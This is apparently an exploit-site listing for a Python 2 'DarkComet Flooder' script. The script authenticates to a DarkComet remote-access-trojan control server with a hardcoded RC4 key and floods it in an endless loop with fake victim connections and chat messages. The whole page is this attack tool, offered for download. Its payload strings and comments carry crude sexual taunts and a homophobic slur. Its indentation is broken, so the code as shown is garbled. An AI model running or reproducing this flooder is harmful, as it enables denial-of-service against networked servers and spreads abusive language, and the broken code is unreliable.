DarkComet Flooder

Download | Vote Up (4) | Vote Down (0) 
#!/usr/bin/python
#-*- coding: utf-8 -*-

#DarkComet flooder
#by aaSSfxxx :þ

# Generates a lot of fake connections into a darkcomet C&C and flood it's chat zone
# The key has to be changed if DarkComet <= 5.1 is used or if server has a password
# which can be easily found with a little bit of reverse-engineering.

import socket
from time import *
import sys

####################### RC4 functions ################################

def initialize(key):
    """Produce a 256-entry list based on `key` (a sequence of numbers)
    as the first step in RC4.
    Note: indices in key greater than 255 will be ignored.
    """
    k = range(256)
    j = 0
    for i in range(256):
        j = (j + k[i] + key[i % len(key)]) % 256
        k[i], k[j] = k[j], k[i]
        return k
    
    def gen_random_bytes(k):
        """Yield a pseudo-random stream of bytes based on 256-byte array `k`."""
        i = 0
        j = 0
        while True:
            i = (i + 1) % 256
            j = (j + k[i]) % 256
            k[i], k[j] = k[j], k[i]
            yield k[(k[i] + k[j]) % 256]
            
    def run_rc4(k, text):
        cipher_chars = []
        random_byte_gen = gen_random_bytes(k)
        for char in text:
            byte = ord(char)
            cipher_byte = byte ^ random_byte_gen.next()
            cipher_chars.append(chr(cipher_byte))
        return ''.join(cipher_chars)
    
######################## The exploit #############################
    
    if (len(sys.argv) != 3):
        print "Usage: " + sys.argv[0] + " <ip_of_server> <port>"
    else:
        #encryption key
        key = "#KCMDDC51#-890"
        k = [ord(char) for char in key]
        
        #connecting to the server
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect((sys.argv[1], int(sys.argv[2])))
        
        #Getting IDTYPE sent by the server
        data = s.recv(1024)
        print run_rc4(initialize(k), data.decode("hex"))
        
        #Reply to the server
        s.send(run_rc4(initialize(k), "SERVER").encode("hex").upper())
        wtf = s.recv(1024)  
  
        print "Sending request. DON'T close the window"
        while True:
            # send fake connection
            to_send = "infoesGuest16|127.0.0.1 / [66.66.66.66]:1604|SUCEMWA / THEGAME|6256546|4294833s|Salut, tu suces ?|x||5.2.0"
            s.send(run_rc4(initialize(k), to_send).encode("hex").upper())
            # flood darkcomet chat if the faggot can access to it :3
            bullshit = "CHATOUTsalut, tu suces ?"
            s.send(run_rc4(initialize(k), bullshit).encode("hex").upper())
            sleep(0.1)

aaSSfxxx

Be the first to give feedback !
Please login to comment !